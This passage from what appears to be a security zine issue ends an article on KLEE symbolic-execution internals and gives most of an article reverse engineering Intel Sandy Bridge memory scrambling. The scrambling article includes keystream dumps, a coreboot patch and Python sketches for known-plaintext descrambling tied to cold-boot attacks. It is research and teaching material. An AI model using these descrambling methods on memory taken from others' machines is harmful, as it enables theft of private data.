    void write8(unsigned offset, uint8_t value);
    void write16(unsigned offset, uint16_t value);
    void write32(unsigned offset, uint32_t value);
    void write64(unsigned offset, uint64_t value);

Objects can be either concrete or symbolic, and these methods implement actions to read or write the object depending on this state. One can switch from concrete to symbolic state by using methods:

    void makeConcrete();
    void makeSymbolic();

These methods will just flush symbolics if we become concrete, or mark all concrete variables as symbolics from now on if we switch to symbolic mode. It's good to play around with these methods to see what happens when you write the value of a variable, or make a new variable symbolic and so on.

When Instruction::Load and ::Store are encountered, the Executor::executeMemoryOperation() method is called where symbolic array bounds checking is implemented. This implementation uses a mix of MemoryObject, ObjectState, AddressSpace::resolveOne() and

54
MemoryObject::getBoundsCheckOffset() to figure out whether any overflow condition can happen. If so, it calls KLEE’s internal API Executor::terminateStateOnError() to signal the memory safety issue and terminate the current state. Symbolic execution will then resume on other states so that KLEE does not stop after the first bug it finds. As it finds more errors, KLEE saves the error locations so it won’t report the same bugs over and over.

Special Function Handlers

A bunch of special functions are defined in KLEE that have special handlers and are not treated as normal functions. See lib/Core/SpecialFunctionHandler.cpp.

Some of these special functions are called from the Executor::executeInstruction() method in the case of the Instruction::Call instruction.

All the klee_* functions are internal KLEE functions which may have been produced by annotations given by the KLEE analyst. (For example, you can add a klee_assume(p) somewhere in the analyzed program’s code to say that p is assumed to be true, thereby some constraints will be pushed into the ConstraintManager of the current state without checking them.) Other functions such as malloc, free, etc. are not treated as normal functions in KLEE. Because the malloc size could be symbolic, KLEE needs to concretize the size according to a few simplistic criteria (like size = 0, size = 2^8, size = 2^16, etc.) to continue making progress. Suffice to say this is quite approximate.

This logic is implemented in the Executor::executeAlloc() and ::executeFree() methods. I have hacked around some modifications to track the heap more precisely in KLEE; however, bear in mind that KLEE’s heap as well as the target program’s heap are both maintained within the same address space, which is extremely intrusive. This makes KLEE a bad framework for layout sensitive analysis, which many exploit generation problems require nowadays. Other special functions include stubs for Address Sanitizer (ASan), which is now included in LLVM and can be enabled while creating LLVM code with clang. ASan is mostly useful for fuzzing so normally invisible corruptions turn into visible assertions. KLEE does not make much use of these stubs and mostly generates a warning if you reach one of the ASan-defined stubs.

Other recent additions were klee_open_merge() and klee_close_merge(), which are an annotation mechanism to perform selected merging in KLEE. Merging happens when you come back from a conditional construct (e.g., a switch, or when you must define whether to continue or break from a loop) as you must select which constraints and values will hold in the state immediately following the merge. KLEE has some interesting merging logic implemented in lib/Core/MergeHandler.cpp that is worth taking a look at.

Experiment with KLEE for yourself!

I did not go much into the details of how to install KLEE as good instructions are available online.[42] Try it for yourself!

I personally use LLVM 3.4 mostly but KLEE also supports LLVM 3.5 reliably, although as far as I know 3.4 is still recommended.

My setup is an amd64 machine on Ubuntu 16.04 that has most of what you will need in packages. I recommend building LLVM and KLEE from sources as well as all dependencies (e.g., Z3 [43] and/or STP [44]); that will help you avoid weird symbol errors in your experiments.

A good first target to try KLEE on is coreutils, which is what pretty much everybody uses in their research paper evaluations nowadays. Coreutils is well tested so new bugs in it are scarce, but it’s good to confirm everything works okay for you. A tutorial on how to run KLEE on coreutils is available as part of the project website.[45]

I personally used KLEE on various targets: coreutils, busybox, as well as other standard network tools that take input from untrusted data. These will require a standalone research paper explaining how KLEE can be used to tackle these targets.
42 http://klee.github.io/build-llvm34/
43 unzip pocorgtfo18.pdf z3.pdf
44 unzip pocorgtfo18.pdf stp.pdf
45 http://klee.github.io/docs/coreutils-experiments/

$ grep -in add\( lib/Core/SpecialFunctionHandler.cpp
66:#define add(name, handler, ret) { name, \
81:  add("calloc", handleCalloc, true),
82:  add("free", handleFree, false),
83:  add("klee_assume", handleAssume, false),
84:  add("klee_check_memory_access", handleCheckMemoryAccess, false),
85:  add("klee_get_valuef", handleGetValue, true),
86:  add("klee_get_valued", handleGetValue, true),
87:  add("klee_get_valuel", handleGetValue, true),
88:  add("klee_get_valuell", handleGetValue, true),
89:  add("klee_get_value_i32", handleGetValue, true),
90:  add("klee_get_value_i64", handleGetValue, true),
91:  add("klee_define_fixed_object", handleDefineFixedObject, false),
92:  add("klee_get_obj_size", handleGetObjSize, true),
93:  add("klee_get_errno", handleGetErrno, true),
94:  add("klee_is_symbolic", handleIsSymbolic, true),
95:  add("klee_make_symbolic", handleMakeSymbolic, false),
96:  add("klee_mark_global", handleMarkGlobal, false),
97:  add("klee_open_merge", handleOpenMerge, false),
98:  add("klee_close_merge", handleCloseMerge, false),
99:  add("klee_prefer_cex", handlePreferCex, false),
100:  add("klee_posix_prefer_cex", handlePosixPreferCex, false),
101:  add("klee_print_expr", handlePrintExpr, false),
102:  add("klee_print_range", handlePrintRange, false),
103:  add("klee_set_forking", handleSetForking, false),
104:  add("klee_stack_trace", handleStackTrace, false),
105:  add("klee_warning", handleWarning, false),
106:  add("klee_warning_once", handleWarningOnce, false),
107:  add("klee_alias_function", handleAliasFunction, false),
108:  add("malloc", handleMalloc, true),
109:  add("realloc", handleRealloc, true),
112:  add("xmalloc", handleMalloc, true),
113:  add("xrealloc", handleRealloc, true),
116:  add("_ZdaPv", handleDeleteArray, false),
118:  add("_ZdlPv", handleDelete, false),
121:  add("_Znaj", handleNewArray, true),
123:  add("_Znwj", handleNew, true),
128:  add("_Znam", handleNewArray, true),
130:  add("_Znwm", handleNew, true),
134:  add("__ubsan_handle_add_overflow", handleAddOverflow, false),
135:  add("__ubsan_handle_sub_overflow", handleSubOverflow, false),
136:  add("__ubsan_handle_mul_overflow", handleMulOverflow, false),
137:  add("__ubsan_handle_divrem_overflow", handleDivRemOverflow, false),
jvanegue@llvmlab1:~/hklee$

Figure 27. KLEE Special Function Handlers
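
The table in Figure 27 can be read as a name-to-handler dispatch map. The following Python toy model is only a sketch of that idea, not KLEE’s code: the class, the three stand-in handlers, and execute_call are all hypothetical, and reading the third add() argument as “this handler returns a value” is an assumption inferred from the listing (true for malloc and the klee_get_value family, false for free and klee_assume).

```python
from typing import Callable, Dict, List, NamedTuple, Optional


class HandlerInfo(NamedTuple):
    handler: Callable[[List[int]], Optional[int]]
    has_return_value: bool  # assumed meaning of the third add() argument


def handle_malloc(args: List[int]) -> Optional[int]:
    # Hypothetical stand-in: every allocation lands at one fixed address.
    return 0x1000


def handle_free(args: List[int]) -> Optional[int]:
    return None


def handle_assume(args: List[int]) -> Optional[int]:
    # A real engine would add args[0] to the path constraints here.
    return None


HANDLERS: Dict[str, HandlerInfo] = {
    "malloc": HandlerInfo(handle_malloc, True),
    "free": HandlerInfo(handle_free, False),
    "klee_assume": HandlerInfo(handle_assume, False),
}


def execute_call(name: str, args: List[int], run_normally):
    """Route a call to its special handler, else interpret it normally."""
    info = HANDLERS.get(name)
    if info is None:
        return run_normally(name, args)  # ordinary function: interpret its body
    result = info.handler(args)
    return result if info.has_return_value else None


print(execute_call("malloc", [16], lambda n, a: "interpreted"))
print(execute_call("strlen", [0x1000], lambda n, a: "interpreted"))
```

The point of the lookup-before-interpretation order is that a special function never has its body executed symbolically, which is why malloc and free can be modeled by the engine itself.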

Symbolic Heap Execution in KLEE
For heap analysis, it appears that KLEE has a strong limitation: heap chunks for KLEE as well as for the target program are maintained in the same address space. One would need to introduce an allocator proxy [46] if we wanted to track any kind of heap layout fidelity for heap prediction purposes. There are spatial issues to consider there as symbolic heap size may lead to heap state space explosion, so more refined heap management may be required. It may be that other tools relying on selective symbolic execution (S2E) [47] are more suitable for some of these problems.

Analyzing Distributed Applications.


These are more complex use-cases where KLEE must be modified to track state across distributed components.[48] Several industrially-sized programs use databases and key-value stores and it is interesting to see what symbolic execution model can be defined for those. This approach has been applied to distributed sensor networks and could also be tried on distributed software in the cloud.

You can either obtain LLVM code by compiling with the clang compiler (3.4 for KLEE) or use a decompiler like McSema [49] and its ReMill library.

There are enough success stories to validate symbolic execution as a practical technology; I encourage you to come up with your own experiments, to figure out what is missing in KLEE to make it work for you. Getting familiar with every corner case of KLEE can be very time consuming, so an approach of “least modification” is typically what I follow.

Beware of restricting yourself to artificial test suites as, beyond their likeness to real world code, they do not take into account all the environmental dependencies that a real project might have. A typical example is that KLEE does not support inline assembly. Another is the heap intrusiveness previously mentioned. These limitations might turn a golden technique like symbolic execution into a vacuous technology if applied to a bad target.

I leave you to that. Have fun and enjoy!

—Julien

46 unzip pocorgtfo18.pdf nextgendebuggers.pdf
47 unzip pocorgtfo18.pdf s2e.pdf
48 unzip pocorgtfo18.pdf kleenet.pdf
49 git clone https://github.com/trailofbits/mcsema

18:09 Memory Scrambling on Intel Sandy Bridge DDR3
by Nico Heijningen

Humble greetings neighbors,

I reverse engineered part of the memory scrambling included in Intel’s Sandy/Ivy Bridge processors. I have distilled my research in a PoC that can reproduce all 2^18 possible 1,024 byte scrambler sequences from a 1,026 bit starting state.[50]

For a while now Intel’s memory controllers have included memory scrambling functionality. Intel’s documentation explains the benefits of scrambling the data before it is written to memory for reducing power spikes and parasitic coupling.[51] Prior research on the topic [52][53] quotes different Intel patents.[54]

Furthermore, some details can be deduced by cross-referencing datasheets of other architectures;[55] for example, the scrambler is initialized with a random 18 bit seed on every boot, the SCRMSEED. Other than this nothing is publicly known or documented by Intel. The prior work shows that scrambled memory can be descrambled, yet newer versions of the scrambler seem to raise the bar, together with prospects of full memory encryption.[56] While the scrambler has never been claimed to provide any cryptographic security, it is still nice to know how the scrambling mechanism works.

Not much is known as to the internals of the memory scrambler. Intel’s patents discuss the use of LFSRs, and the work of Bauer et al. has modeled the scrambler as a stream cipher with a short period. Hence the possibility of a known-plaintext attack to recover scrambled data: if you know part of the memory content you can obtain the cipher stream by XORing the scrambled memory with the plaintext. Once you know the cipher stream you can repeatedly XOR it with the scrambled data to obtain the original unscrambled data.

[Figure: LFSR-based scrambler. Labels: Data, Scrambled data, State (1 0 1 0), Output bits / PRBS, Feedback bit.]

An analysis of the properties of the cipher stream has to our knowledge never been performed. Here I will describe my journey in obtaining the cipher stream and analyzing it.

First we set out to reproduce the work of Bauer et al.: by performing a cold-boot attack we were able to obtain a copy of memory. However, because this is quite a tedious procedure, it is troublesome to profile different scrambler settings. Bauer’s work is built on ‘differential’ scrambler images: scrambled with one SCRMSEED and descrambled with another. The data obtained by using the procedure of Bauer et al. contains some artifacts because of this.

We found that it is possible to disable the memory scrambler using an undocumented Intel register and used coreboot to set it early in the boot process. We patched coreboot to try and automate the process of profiling the scrambler. We chose the Sandy Bridge platform both because Bauer et al.’s work was based on it and because coreboot’s memory initialization code has been reverse engineered for the platform.[57] Although coreboot builds out-of-the-box for the Gigabyte GA-B75M-D3V motherboard we used, coreboot’s makefile ecosystem is quite something to wrap your head around. The code contains some lines dedicated to the memory scrambler, setting the scrambling seed or SCRMSEED. I patched the code in Figure 28 to disable the
50 unzip pocorgtfo18.pdf IntelMemoryScrambler.zip
51 See for example Intel’s 3rd generation processor family datasheet section 2.1.6 Data Scrambling.
52 Johannes Bauer, Michael Gruhn, and Felix C. Freiling. “Lest we forget: Cold-boot attacks on scrambled DDR3 memory.” In: Digital Investigation 16 (2016), S65–S74.
53 Yitbarek, Salessawi Ferede, et al. “Cold Boot Attacks are Still Hot: Security Analysis of Memory Scramblers in Modern Processors.” High Performance Computer Architecture (HPCA), 2017 IEEE International Symposium on. IEEE, 2017.
54 USA Patents 7945050, 8503678, and 9792246.
55 See 24.1.45 DSCRMSEED of N-series Intel(R) Pentium(R) Processors and Intel(R) Celeron(R) Processors Datasheet – Volume 2 of 3, February 2016.
56 Both Intel and AMD have introduced their flavor of memory encryption.
57 For most platforms the memory initialization code is only available as a blob from Intel.

static void set_scrambling_seed(ramctr_timing *ctrl)
{
    int channel;

    /* FIXME: we hardcode seeds. Do we need to use some PRNG for them?
       I don't think so. */
    static u32 seeds[NUM_CHANNELS][3] = {
        {0x00009a36, 0xbafcfdcf, 0x46d1ab68},
        {0x00028bfa, 0x53fe4b49, 0x19ed5483}
    };
    FOR_ALL_POPULATED_CHANNELS {
        MCHBAR32(0x4020 + 0x400 * channel) &= ~0x10000000;
        write32(DEFAULT_MCHBAR + 0x4034, seeds[channel][0]);
        write32(DEFAULT_MCHBAR + 0x403c, seeds[channel][1]);
        write32(DEFAULT_MCHBAR + 0x4038, seeds[channel][2]);
    }
}

Figure 28. Coreboot’s Scrambling Seed for Sandy Bridge
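
The known-plaintext recovery described earlier can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the helper name xor_bytes and the 8-byte secret are made up for the example, and the cipher stream is the eight bytes this article reports reading back at address 0x10000070 for one SCRMSEED.

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have the same length")
    return bytes(x ^ y for x, y in zip(a, b))


# Cipher stream reported in this article for address 0x10000070.
cipher_stream = bytes.fromhex("3A E0 9D 70 4E B8 27 5C")

# Known plaintext: eight zero bytes. XORing zeroes with the stream
# leaves the stream itself, which is why zero-filled memory is handy.
known_plaintext = bytes(8)
scrambled_zeroes = xor_bytes(known_plaintext, cipher_stream)
recovered_stream = xor_bytes(scrambled_zeroes, known_plaintext)

# Hypothetical secret stored at the same address under the same seed.
secret = b"PoC|GTFO"
scrambled_secret = xor_bytes(secret, cipher_stream)
descrambled = xor_bytes(scrambled_secret, recovered_stream)

print(recovered_stream.hex(" "))
print(descrambled)
```

The same stream only descrambles data that was scrambled at the same address with the same SCRMSEED, which is why the seed is pinned before each measurement.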

memory scrambler, write all zeroes to memory, reset the machine, enable the memory scrambler with a specific SCRMSEED, and print a specific memory region to the debug console. (COM port.) This way we are able to obtain the cipher stream for different SCRMSEEDs. For example, when writing eight bytes of zeroes to the memory address starting at 0x10000070 with the scrambler disabled, we read 3A E0 9D 70 4E B8 27 5C back from the same address once the PC is reset and the scrambler is enabled. We know that that’s the cipher stream for that memory region. A reset is required as the SCRMSEED can no longer be changed nor the scrambler disabled after memory initialization has finished. (Registers need to be locked before the memory can be initialized.)

Now some leads by Bauer et al. based on the Intel patents quickly led us in the direction of analyzing the cipher stream as if it were the output of an LFSR. However, taking a look at any one of the cipher streams reveals a rather distinctive usage of an LFSR. It seems as if the complete internal state of the LFSR is used as the cipher stream for three shifts, after which the internal state is reset into a fresh starting state and shifted three times again. (See Figure 29.)

    00111010 11100000
    10011101 01110000
    01001110 10111000
    00100111 01011100

It is interesting to note that a feedback bit is being shifted in on every clocktick. Typically only the bit being shifted out of the LFSR would be used as part of the ‘random’ cipher stream being generated, instead of the LFSR’s complete internal state. The latter no longer produces a random stream of data; the consequences of this are not known, but it is probably done for performance optimization.

These properties could suggest multiple constructions. For example, layered LFSRs where one LFSR generates the next LFSR’s starting state, and part of the latter’s internal state being used as output. However, the actual construction is unknown. The number of combined LFSRs is not known, neither is their polynomial (positions of the feedback taps), nor their length, nor the manner in which they’re combined.

Normally it would be possible to deduce such information by choosing a typical length, e.g. 16-bit, LFSR and applying the Berlekamp-Massey algorithm. The algorithm uses the first 16 bits in the cipher stream and deduces which polynomials could possibly produce the next bits in the cipher stream. However, because of the previously described unknowns this leads us to a dead end. Back to the drawing board!

By automating the cipher stream acquisition, also patching coreboot to parse input from the serial console, we were able to dynamically set the SCRMSEED, then obtain the cipher stream. Writing a Python script to control the PC via a serial cable enabled us to iterate all 2^18 possible SCRMSEEDs and

06 38 83 1C C1 8E 60 C7 E2 20 F1 10 F8 88 7C 44
86 5A C3 2D 61 96 30 CB E1 68 70 B4 B8 5A 5C 2D
D6 D8 EB 6C 75 B6 3A DB 50 F2 28 79 94 3C 4A 1E
3A E0 9D 70 4E B8 27 5C 37 80 1B C0 0D E0 06 F0
LFSR stretch

00111010 11100000 10011101 01110000 01001110 10111000 00100111 01011100

Figure 29. Keyblock
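
The “state plus three shifts” reading of Figure 29 can be checked mechanically. The sketch below is an illustration only: it assumes each 8-byte stretch is four big-endian 16-bit words, that the state shifts right by one position per step, and that the feedback bit enters at the top bit. The function names are made up for the example; the bytes are the keyblock printed in Figure 29.

```python
KEYBLOCK = bytes.fromhex(
    "06 38 83 1C C1 8E 60 C7 E2 20 F1 10 F8 88 7C 44 "
    "86 5A C3 2D 61 96 30 CB E1 68 70 B4 B8 5A 5C 2D "
    "D6 D8 EB 6C 75 B6 3A DB 50 F2 28 79 94 3C 4A 1E "
    "3A E0 9D 70 4E B8 27 5C 37 80 1B C0 0D E0 06 F0"
)


def split_words(stretch: bytes):
    """Split an 8-byte stretch into four big-endian 16-bit words."""
    return [int.from_bytes(stretch[i:i + 2], "big") for i in range(0, 8, 2)]


def feedback_bits(stretch: bytes):
    """Return the bits shifted in at the top, or None if the words
    are not successive one-bit right shifts of each other."""
    words = split_words(stretch)
    bits = []
    for prev, cur in zip(words, words[1:]):
        if cur & 0x7FFF != prev >> 1:
            return None
        bits.append(cur >> 15)
    return bits


stretches = [KEYBLOCK[i:i + 8] for i in range(0, len(KEYBLOCK), 8)]
for stretch in stretches:
    print(stretch.hex(" "), feedback_bits(stretch))
```

A result of None for any stretch would mean the shift model does not fit that stretch; the returned lists are the three feedback bits per stretch, which is the raw material one would need before guessing at feedback taps.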

save their accompanying 1024 byte cipher streams. Acquiring all cipher streams took almost a full week. This data now allowed us to try and find relations between the SCRMSEED and the produced cipher stream. Stated differently, is it possible to reproduce the scrambler’s working by using fewer than 2^18 × 1024 bytes?

This analysis was eased once we stumbled upon a patent describing the use of the memory bus as a high speed interconnect, under the name of TeraDIMM.[58] Using the memory bus as such, one would only receive scrambled data on the other end, hence the data needs to be descrambled. The authors give away some of their knowledge on the subject: the cipher stream can be built from XORing specific regions of the stream together. This insight paved the way for our research into the memory scrambling.

The main distinction that the TeraDIMM patent makes is between the scrambling based on four bits of the memory address and the scrambling based on the (18-bit) SCRMSEED. Both the memory address- and SCRMSEED-based scrambling are used to generate the cipher stream 64 byte blocks at a time.[59] Each 64 byte cipher-stream block is a (linear) combination of different blocks of data that are selected with respect to the bits of the memory address. See Figure 30.

Because the address-based scrambling does not depend on the SCRMSEED, this is canceled out in the differential images obtained by Bauer. This is how far the TeraDIMM patent takes us; however, with this and our data in mind it was easy to see that the SCRMSEED-based scrambling is also built up by XORing blocks together. Again depending on the bits of the SCRMSEED set, different blocks are XORed together.

Hence, to reproduce any possible cipher stream we only need four such blocks for the address scrambling, and eighteen blocks for the SCRMSEED scrambling. We have named the eighteen SCRMSEEDs that produce the latter blocks the (SCRMSEED) toggleseeds. We’ll leave the four address scrambling blocks for now and focus on the toggleseeds.

The next step in distilling the redundancy in the cipher stream is to exploit the observation that for specific toggleseeds parts of the 64 byte blocks overlap in a sequential manner. (See Figure 32.) The 18 toggleseeds can be placed in four groups and any block of data associated with the toggleseeds can be reproduced by picking a different offset in the non-redundant stream of one of the four groups. Going back from the overlapping stream to the cipher stream of SCRMSEED 0x100 we start at an offset of 8 bytes and take 64 bytes, obtaining 00 30 80 ... 87 b7 c3.
58 US Patent 8713379.
59 This is the largest amount of data that can be burst over the DDR3 bus.

Figure 30. TeraDIMM Scrambling
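
The “XOR the blocks of the set seed bits” model can be written down directly. The following is a sketch under assumptions, not the author’s PoC: seed_part and xor_bytes are hypothetical names, only the first eight bytes of two toggleseed blocks (taken from Figure 32) are included, and the address-dependent blocks are left out entirely, so the result models only the SCRMSEED-dependent part and is a prediction rather than measured data.

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


# First eight bytes of two toggleseed blocks, as printed in Figure 32.
TOGGLE_BLOCKS = {
    0x10: bytes.fromhex("20 00 10 00 08 00 04 00"),
    0x100: bytes.fromhex("00 30 80 18 40 0c 20 06"),
}


def seed_part(seed: int, toggle_blocks: dict, block_len: int) -> bytes:
    """XOR together the block of every toggleseed bit set in seed.

    Raises KeyError if a set bit has no block in toggle_blocks.
    """
    out = bytes(block_len)
    for bit in range(18):  # the SCRMSEED is 18 bits wide
        toggle = 1 << bit
        if seed & toggle:
            out = xor_bytes(out, toggle_blocks[toggle])
    return out


# Model's prediction for a seed with two bits set.
print(seed_part(0x110, TOGGLE_BLOCKS, 8).hex(" "))
```

With all eighteen toggleseed blocks in the table, the same loop would cover every one of the 2^18 seeds from 18 × 64 bytes of data instead of a full dump per seed.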

   
Finally, the overlapping streams of two of the four groups can be used to define the other two, by combining specific eight byte stretches, i.e., multiplying the stream with a static matrix. For example, to obtain the first stretch of the overlapping stream of SCRMSEEDs 0x4, 0x10, 0x100, 0x1000, and 0x10000 we combine the fifth and the sixth stretch of the overlapping stream of SCRMSEEDs 0x1, 0x40, 0x400, and 0x4000. That is 20 00 10 00 08 00 04 00 = 00 01 00 00 00 00 00 00 ^ 20 01 10 00 08 00 04 00. The matrix is the same between the two groups and provided in Figure 31. One is invited to verify the correctness of that figure using Figure 32.

\[
\mathrm{overlappingstream}(z) =
\begin{pmatrix}
0&0&0&0&1&1&0&0&0&0&0&0\\
0&0&0&0&0&1&1&0&0&0&0&0\\
0&0&0&0&0&0&1&1&0&0&0&0\\
0&0&0&0&0&0&0&1&1&0&0&0\\
0&0&0&0&0&0&0&0&1&1&0&0\\
0&0&0&0&0&0&0&0&0&1&1&0\\
0&0&0&0&0&0&0&0&0&0&1&1\\
0&0&0&1&0&0&0&0&0&0&1&1\\
0&0&0&1&1&0&0&0&0&0&1&1\\
0&0&0&1&1&1&0&0&0&0&1&1\\
0&0&0&1&1&1&1&0&0&0&1&1\\
0&0&0&1&1&1&1&1&0&0&1&1
\end{pmatrix}
\cdot
\begin{pmatrix}
\mathrm{stretch}_0\\ \mathrm{stretch}_1\\ \mathrm{stretch}_2\\ \mathrm{stretch}_3\\
\mathrm{stretch}_4\\ \mathrm{stretch}_5\\ \mathrm{stretch}_6\\ \mathrm{stretch}_7\\
\mathrm{stretch}_8\\ \mathrm{stretch}_9\\ \mathrm{stretch}_{10}\\ \mathrm{stretch}_{11}
\end{pmatrix}
\]

Figure 31. Scrambler Matrix

Some future work remains to be done. We postulate the existence of a mathematical basis to these observations, but a nice mathematical relationship underpinning the observations is yet to be found. Any additional details can be found in my TUE thesis.[60]
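
The invitation to check Figure 31 against Figure 32 can be taken up in a short Python sketch. It rests on one assumption that should be stated loudly: the overlapping stream of SCRMSEEDs 0x1, 0x40, 0x400, and 0x4000 is printed with only eleven stretches, and the sketch treats the missing one as stretch 0, filling it with zeroes. That placeholder cannot affect the result because column 0 of the matrix is never set. The names apply_matrix, SOURCE, and TARGET are made up for the example.

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    return bytes(x ^ y for x, y in zip(a, b))


# Rows of Figure 31; column j selects stretch j of the source stream.
MATRIX = [
    "000011000000", "000001100000", "000000110000", "000000011000",
    "000000001100", "000000000110", "000000000011", "000100000011",
    "000110000011", "000111000011", "000111100011", "000111110011",
]

# Stream of SCRMSEEDs 0x1, 0x40, 0x400, 0x4000 (Figure 32), with a
# zero placeholder for the unprinted first stretch (assumption).
SOURCE = bytes(8) + bytes.fromhex(
    "80 02 40 01 20 00 10 00 "
    "06 18 83 0c c1 86 e0 c3 38 00 1c 00 0e 00 07 00 "
    "00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00 "
    "20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93 "
    "67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa "
    "e7 d1 f3 e8 79 f4 3c fa 61 cf 30 e7 18 73 8c 39"
)

# Stream of SCRMSEEDs 0x4, 0x10, 0x100, 0x1000, 0x10000 (Figure 32).
TARGET = bytes.fromhex(
    "20 00 10 00 08 00 04 00 00 30 80 18 40 0c 20 06 "
    "04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 "
    "00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 "
    "86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 "
    "be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 "
    "be 2f 5f 17 2f 8b 97 c5 9a b6 cd 5b 66 ad b3 56"
)


def apply_matrix(matrix, stream: bytes) -> bytes:
    """Multiply a 0/1 matrix with a stream of 8-byte stretches over GF(2)."""
    src = [stream[i:i + 8] for i in range(0, len(stream), 8)]
    out = b""
    for row in matrix:
        acc = bytes(8)
        for j, bit in enumerate(row):
            if bit == "1":
                acc = xor_bytes(acc, src[j])
        out += acc
    return out


derived = apply_matrix(MATRIX, SOURCE)
print("matrix reproduces the other stream:", derived == TARGET)
```

Row 0 of the matrix is exactly the worked example in the text: it selects stretches 4 and 5 of the source, i.e. the fifth and the sixth.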

60 unzip pocorgtfo18.pdf heijningen-thesis.pdf

SCRMSEED=0x4 SCRMSEED=0x1
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93
be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa
be 2f 5f 17 2f 8b 97 c5 9a b6 cd 5b 66 ad b3 56 e7 d1 f3 e8 79 f4 3c fa 61 cf 30 e7 18 73 8c 39

SCRMSEED=0x10
20 00 10 00 08 00 04 00 00 30 80 18 40 0c 20 06
04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3

SCRMSEED=0x100 SCRMSEED=0x40
00 30 80 18 40 0c 20 06 04 a8 02 54 01 2a 00 95 80 02 40 01 20 00 10 00 06 18 83 0c c1 86 e0 c3
43 4a 21 a5 10 d2 08 69 00 04 00 02 80 01 40 00 38 00 1c 00 0e 00 07 00 00 01 00 00 00 00 00 00
80 06 40 03 a0 01 50 00 86 1e c3 0f 61 87 b0 c3 20 01 10 00 08 00 04 00 20 31 90 18 48 0c 24 06
be 1e df 0f 6f 87 b7 c3 be 1f df 0f 6f 87 b7 c3 24 99 92 4c 49 26 24 93 67 d3 b3 e9 59 f4 2c fa

SCRMSEED=0x1000 SCRMSEED=0x400
04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 06 18 83 0c c1 86 e0 c3 38 00 1c 00 0e 00 07 00
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00

62
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93
be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa

SCRMSEED=0x10000 SCRMSEED=0x4000
43 4a 21 a5 10 d2 08 69 00 04 00 02 80 01 40 00 38 00 1c 00 0e 00 07 00 00 01 00 00 00 00 00 00
80 06 40 03 a0 01 50 00 86 1e c3 0f 61 87 b0 c3 20 01 10 00 08 00 04 00 20 31 90 18 48 0c 24 06
be 1e df 0f 6f 87 b7 c3 be 1f df 0f 6f 87 b7 c3 24 99 92 4c 49 26 24 93 67 d3 b3 e9 59 f4 2c fa
9e 1e cf 0f 67 87 b3 c3 be 2f 5f 17 2f 8b 97 c5 67 d7 b3 eb d9 f5 6c fa e7 d1 f3 e8 79 f4 3c fa

The non-redundant/overlapping stream of SCRMSEEDS The non-redundant/overlapping stream of SCRMSEEDS


0x4, 0x10, 0x100, 0x1000, and 0x10000: 0x1, 0x40, 0x400, and 0x4000:
20 00 10 00 08 00 04 00 00 30 80 18 40 0c 20 06 80 02 40 01 20 00 10 00
04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 06 18 83 0c c1 86 e0 c3 38 00 1c 00 0e 00 07 00
00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 00 01 00 00 00 00 00 00 20 01 10 00 08 00 04 00
86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 20 31 90 18 48 0c 24 06 24 99 92 4c 49 26 24 93
be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 67 d3 b3 e9 59 f4 2c fa 67 d7 b3 eb d9 f5 6c fa
be 2f 5f 17 2f 8b 97 c5 9a b6 cd 5b 66 ad b3 56 e7 d1 f3 e8 79 f4 3c fa 61 cf 30 e7 18 73 8c 39

Figure 32. Overlapping Streams
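
Where each seed’s 64 byte block sits inside its group’s overlapping stream can be found by a plain substring search. The sketch below is an illustration only; find_offset and the dictionary layout are made up for the example, and the bytes are copied from Figure 32. The offsets are searched for rather than hard-coded, so they depend only on the bytes as printed. With those bytes, the block of SCRMSEED 0x100 turns up 8 bytes into the stream and that of 0x1000 turns up 16 bytes in.

```python
# Overlapping stream of SCRMSEEDs 0x4, 0x10, 0x100, 0x1000, 0x10000.
STREAM = bytes.fromhex(
    "20 00 10 00 08 00 04 00 00 30 80 18 40 0c 20 06 "
    "04 a8 02 54 01 2a 00 95 43 4a 21 a5 10 d2 08 69 "
    "00 04 00 02 80 01 40 00 80 06 40 03 a0 01 50 00 "
    "86 1e c3 0f 61 87 b0 c3 be 1e df 0f 6f 87 b7 c3 "
    "be 1f df 0f 6f 87 b7 c3 9e 1e cf 0f 67 87 b3 c3 "
    "be 2f 5f 17 2f 8b 97 c5 9a b6 cd 5b 66 ad b3 56"
)

# Two of the 64 byte blocks from Figure 32, keyed by SCRMSEED.
BLOCKS = {
    0x100: bytes.fromhex(
        "00 30 80 18 40 0c 20 06 04 a8 02 54 01 2a 00 95 "
        "43 4a 21 a5 10 d2 08 69 00 04 00 02 80 01 40 00 "
        "80 06 40 03 a0 01 50 00 86 1e c3 0f 61 87 b0 c3 "
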